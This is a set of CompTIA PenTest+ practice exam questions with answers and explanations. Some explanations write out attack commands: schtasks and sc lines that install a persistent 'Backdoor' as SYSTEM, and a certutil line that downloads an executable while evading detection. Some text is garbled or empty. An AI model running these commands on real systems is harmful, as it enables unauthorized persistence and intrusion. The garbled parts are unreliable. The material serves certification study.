CompTIA PT0-003 Online Practice Questions and Exam Preparation

CompTIA PT0-003 Online Questions & Answers

• Question 351:

  A penetration tester is taking screen captures of hashes obtained from a domain controller.

  Which of the following best explains why the penetration tester should immediately obscure portions of the images before saving?

  A. To maintain confidentiality of data/information
  B. To avoid disclosure of how the hashes were obtained
  C. To make the hashes appear shorter and easier to crack
  D. To prevent analysis based on the type of hash
  A. To maintain confidentiality of data/information

  ---

  Explanation

  When a penetration tester captures screen images that include hashes from a domain controller, obscuring parts of these images before saving is crucial to maintain the confidentiality of sensitive data. Hashes can be considered sensitive information as they represent a form of digital identity for users within an organization. Revealing these hashes in full could lead to unauthorized access if the hashes were to be cracked or otherwise misused by malicious actors. By partially obscuring the images, the penetration tester ensures that the data remains confidential and reduces the risk of compromising user accounts and the integrity of the organization's security posture.

• Question 352:

  During a red-team exercise, a penetration tester obtains an employee's access badge. The tester uses the badge's information to create a duplicate for unauthorized entry.

  Which of the following best describes this action?

  A. Smurfing
  B. Credential stuffing
  C. RFID cloning
  D. Card skimming
  C. RFID cloning

  ---

  Explanation

  RFID cloning involves copying data from an existing access card to create a duplicate badge. Attackers use tools like Proxmark3 or Flipper Zero to capture and replicate RFID signals.

  Option A (Smurfing): A DDoS attack technique, unrelated to physical security.

  Option B (Credential stuffing): Uses compromised usernames/passwords, not RFID badges.

  Option C (RFID cloning): Correct. Creates a duplicate access badge using RFID technology.

  Option D (Card skimming): Steals credit card data, but does not duplicate RFID badges.

  References:

  CompTIA PenTest+ PT0-003 Official Guide ?Physical Security Testing&

  RFID Cloning

• Question 353:

  Before beginning a penetration test, which document must be obtained to ensure the tester has explicit permission to perform testing on the defined systems and to provide legal protection for both parties?

  A. Non-disclosure agreement
  B. Escalation process
  C. URL list
  D. Authorization letter
  D. Authorization letter

  ---

  Explanation

  While several items listed are important parts of an overall engagement package, the authorization letter (often called written authorization, engagement letter, or authorization to test) is mandatory before testing begins -- it explicitly grants permission to test specified systems under defined scope and constraints and provides legal protection for both parties. An RoE typically references or attaches the NDA (A), includes escalation/contact processes (B), and provides target lists (C), but without the formal authorization letter the engagement should not proceed.

  CompTIA PT0-003 Mapping:

  Domain 1.0 Planning and Scoping -- obtain written authorization and define rules of engagement prior to testing.

• Question 354:

  DRAG DROP

  During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

  INSTRUCTIONS

  Analyze the code segments to determine which sections are needed to complete a port scanning script.

  Drag the appropriate elements into the correct locations to complete the script.

  If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

  Select and Place:

  

  

  ---

  
  

• Question 355:

  A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week.

  Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

  A. schtasks.exe
  B. rundll.exe
  C. cmd.exe
  D. chgusr.exe
  E. sc.exe
  F. netsh.exe
  A. schtasks.exe
  E. sc.exe

  ---

  Explanation

  To reenter the system remotely after the patch for the recently exploited RCE vulnerability has been deployed, the penetration tester can use schtasks.exe and sc.exe.

  schtasks.exe:

  Purpose: Used to create, delete, and manage scheduled tasks on Windows systems.

  Persistence: By creating a scheduled task, the tester can ensure a script or program runs at a specified time, providing a persistent backdoor.

  Example:

  schtasks /create /tn "Backdoor" /tr "C:\path\to\backdoor.exe" /sc daily /ru SYSTEM

  sc.exe:

  Purpose: Service Control Manager command-line tool used to manage Windows services.

  Persistence: By creating or modifying a service to run a malicious executable, the tester can maintain persistent access.

  Example:

  sc create backdoor binPath= "C:\path\to\backdoor.exe" start= auto

  Other Utilities:

  rundll.exe: Used to run DLLs as applications, not typically used for persistence.

  cmd.exe: General command prompt, not specifically used for creating persistence mechanisms.

  chgusr.exe: Used to change install mode for Remote Desktop Session Host, not relevant for persistence.

  netsh.exe: Used for network configuration, not typically used for persistence.

  References:

  Post-Exploitation: Establishing persistence is crucial to maintaining access after initial exploitation.

  Windows Tools: Understanding how to leverage built-in Windows tools like schtasks.exe and sc.exe to create backdoors that persist through reboots and patches.

  By using schtasks.exe and sc.exe, the penetration tester can set up persistent mechanisms that will allow reentry into the system even after the patch is applied.

• Question 356:

  A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection.

  Which of the following tools would the tester most likely use?

  A. netsh.exe
  B. certutil.exe
  C. nc.exe
  D. cmdkey.exe
  B. certutil.exe

  ---

  Explanation

  Certutil.exe for File Downloads:

  certutil.exe is a native Windows utility primarily used for managing certificates but can also be leveraged to download files from the internet.

  Example command:

  bash

  Copy code

  certutil.exe

  -urlcache -split -f

  http://example.com/file.exefile.exeItsnativestatushelpsitevadedetectionbysecuritytools.WhyNotOtherOptions?OptionA(netsh.exe):Usedfornetworkconfigurationbutnotfordownloadingfiles.OptionC(nc.exe):NetcatisnotnativetoWindowsandwouldneedtobeintroducedtothesystem.OptionD(cmdkey.exe):Usedformanagingstoredcredentials,notdownloadingfiles.

  References:

  Domain 3.0 (Attacks and Exploits)

• Question 357:

  A penetration tester cannot find information on the target company's systems using common OSINT methods. The tester's attempts to do reconnaissance against internet-facing resources have been blocked by the company's WAF.

  Which of the following is the best way to avoid the WAF and gather information about the target company's systems?

  A. HTML scraping
  B. Code repository scanning
  C. Directory enumeration
  D. Port scanning
  B. Code repository scanning

  ---

  Explanation

  When traditional reconnaissance methods are blocked, scanning code repositories is an effective method to gather information. Here's why:

  Code Repository Scanning:

  Leaked Information: Code repositories (e.g., GitHub, GitLab) often contain sensitive information, including API keys, configuration files, and even credentials that developers might inadvertently commit.

  Accessible: These repositories can often be accessed publicly, bypassing traditional defenses like WAFs.

  Comparison with Other Methods:

  HTML Scraping: Limited to the data present on web pages and can still be blocked by WAF.

  Directory Enumeration: Likely to be blocked by WAF as well and might not yield significant internal information.

  Port Scanning: Also likely to be blocked or trigger alerts on WAF or IDS/IPS systems.

  Scanning code repositories allows gathering a wide range of information that can be critical for further penetration testing effort

• Question 358:

  During a penetration test, the tester wants to obtain public information that could be used to compromise the organization's cloud infrastructure.

  Which of the following is the most effective resource for the tester to use for this purpose?

  A. Sensitive documents on a public cloud
  B. Open ports on the cloud infrastructure
  C. Repositories with secret keys
  D. SSL certificates on websites
  C. Repositories with secret keys

  ---

  Explanation

  Publicly accessible code repositories (GitHub, GitLab, Bitbucket, etc.) frequently leak API keys, service account credentials, private keys, or other secrets embedded in source code, configuration files, CI/CD pipelines, or commit histories. These secrets can provide direct access to cloud resources (storage blobs, databases, management APIs) and are therefore one of the most effective public sources for compromising cloud infrastructure.

  Why the other options are less effective as public sources:

  Option A: Sensitive documents on a public cloud -- if truly public, they may contain useful info, but sensitive documents are typically not intentionally left public; repositories with keys are a more common accidental exposure.

  Option B: Open ports on the cloud infrastructure -- helpful for attack surface analysis, but open ports alone don't directly provide credentials or cloud-management access.

  Option D: SSL certificates on websites -- useful for host identification and fingerprinting, but rarely give direct access to cloud management.

  CompTIA PT0-003 Mapping: Information gathering and open-source intelligence (OSINT) techniques to discover credentials and secrets that enable cloud compromise.

• Question 359:

  A penetration tester wants to use the following Bash script to identify active servers on a network:

  1 network_addr="192.168.1"

  2 for h in {1..254}; do

  3 ping -c 1 -W 1 $network_addr.$h > /dev/null 4 if [ $?

  -eq 0 ]; then 5 echo "Host $h is up" 6 else 7 echo "Host $h is down" 8 fi 9 done Which of the following should the tester do to modify the script?

  A. Change the condition on line 4.
  B. Add 2>&1 at the end of line 3.
  C. Use seq on the loop on line 2.
  D. Replace $h with ${h} on line 3.
  C. Use seq on the loop on line 2.

  ---

  Explanation

  The provided Bash script is used to ping a range of IP addresses to identify active hosts on a network. The loop iterates through possible host numbers and sends a single ping request to each address.

  Analysis Line 2: The loop uses {1..254} to iterate over the range of host addresses. However, this brace expansion syntax may not work in all shell environments, particularly if the script is executed in a shell other than Bash. Some environments require a more portable method to generate a numeric sequence.

  Using seq for better compatibility

  The seq command is a more portable way to generate a sequence of numbers. It ensures the loop functions correctly across different shell environments.

  Modified line 2:

  for h in $(seq 1 254); do

  This change improves compatibility and reliability when the script runs in environments that do not support brace expansion.

  Modified Script

  1 network_addr="192.168.1" 2 for h in $(seq 1 254); do

  3 ping -c 1 -W 1 $network_addr.$h > /dev/null 4 if [ $? -eq 0 ]; then 5 echo "Host $h is up" 6 else 7 echo "Host $h is down" 8 fi 9 done

• Question 360:

  A penetration tester wants to collect credentials against an organization with a PEAP infrastructure.

  Which of the following tools should the tester use?

  A. InSSIDer
  B. HackRF One
  C. WiFi-Pumpkin
  D. Aircrack-ng
  C. WiFi-Pumpkin

  ---

  Explanation

  PEAP is an 802.1X "enterprise" wireless authentication method that uses a TLS tunnel to protect an inner authentication exchange (commonly username/password-based mechanisms). In PenTest+ wireless assessments, credential collection against enterprise Wi-Fi is most often attempted through rogue access point / evil twin style attacks combined with social engineering and traffic relaying, where the tester stands up an attacker-controlled AP to entice clients to connect and then captures authentication attempts or harvests credentials via a controlled portal/workflow.

  WiFi-Pumpkin is a framework designed to rapidly create rogue APs and support interception and credential-harvesting scenarios, aligning with the objective of collecting credentials during a controlled wireless security test. InSSIDer is primarily for wireless discovery and signal/AP enumeration, not credential collection. HackRF One is SDR hardware useful for radio experimentation and analysis, but it is not a complete PEAP credential-harvesting workflow by itself. Aircrack-ng is most associated with WPA/ WPA2-PSK capture /cracking and general 802.11 attacks, but it is not the best fit for PEAP credential collection compared with a rogue-AP framework.